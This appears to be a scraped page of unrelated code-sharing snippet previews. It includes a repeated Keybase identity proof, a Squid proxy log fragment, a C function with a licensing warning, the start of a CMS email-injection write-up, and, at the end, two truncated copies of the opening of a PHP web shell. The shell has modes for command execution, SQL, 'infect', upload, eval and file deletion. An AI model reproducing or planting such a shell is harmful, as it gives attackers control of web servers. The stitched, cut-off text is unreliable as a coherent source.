I hereby claim:
- I am kosborn on github.
- I am kos (https://keybase.io/kos) on keybase.
- I have a public key ASDsNmhV1lARSRRYFpM2u1ytRTx9llez-98OXc1EoQ0zgwo
To claim this, I am signing this object:
1286536308.779 180 192.168.0.224 TCP_MISS/200 411 GET http://liveupdate.symantecliveupdate.com/minitri.flg - DIRECT/125.23.216.203 text/plain | |
1286536308.910 37 192.168.0.224 TCP_MISS/200 4083 GET http://liveupdate.symantecliveupdate.com/streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip - DIRECT/125.23.216.203 application/zip | |
1286536309.450 917 192.168.0.227 TCP_MISS/200 20670 GET http://www.youtube.com/watch? - DIRECT/209.85.231.136 text/html | |
1286536309.549 172 192.168.0.227 TCP_MISS/204 294 GET http://v15.lscache3.c.youtube.com/generate_204? - DIRECT/122.160.120.150 text/html | |
1286536309.586 921 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tubemogul.co...eiver/services - DIRECT/174.129.41.128 application/xml | |
1286536309.608 829 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tubemogul.co...eiver/services - DIRECT/174.129.41.128 application/xml | |
1286536309.660 785 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tube |
I hereby claim:
To claim this, I am signing this object:
Bool | |
senescent_p (void) | |
{ | |
/* If you are in here because you're planning on disabling this warning | |
before redistributing my software, please don't. | |
I sincerely request that you do one of the following: | |
1: leave this code intact and this warning in place, -OR- |
This is kind of a dumb bug, but interesting none the less. It was found by Yoni Ramon and myself while testing for vulnerabilities in a CMS at the beginning of 2014. While the particular injection point on the CMS was not vulnerable, we noticed it was sending HTML in emails directly to users. HTML in emails is not really a vulnerability, however this we discovered a JS-filtering bypass that allowed us to inject JS into the client.
The short version is (long version in email below):
<? | |
@set_time_limit(0); | |
$modearr = array("cmd", "sql", "infect", "upload", "ws_ver", "ws_remove", "ws_read", "ws_save", "ws_mail", "ws_eval", "ws_list", "ws_homedir", "ws_delete", "ws_makedir", "ws_rmdir", "ws_down"); | |
$mode = $_REQUEST['mode']; | |
if (in_array($mode, $modearr)) { | |
function ws_stripslashes($string) { | |
if (get_magic_quotes_gpc()) { | |
return StripSlashes($string); | |
} else { | |
return $string; |
<?php | |
@set_time_limit(0); | |
$modearr = array("cmd", "sql", "infect", "upload", "ws_ver", "ws_remove", "ws_read", "ws_save", "ws_mail", "ws_eval", "ws_list", "ws_homedir", "ws_delete", "ws_makedir", "ws_rmdir", "ws_down"); | |
$mode = $_REQUEST['mode']; | |
if (in_array($mode, $modearr)) { | |
function ws_stripslashes($string) { | |
if (get_magic_quotes_gpc()) { | |
return StripSlashes($string); | |
} else { |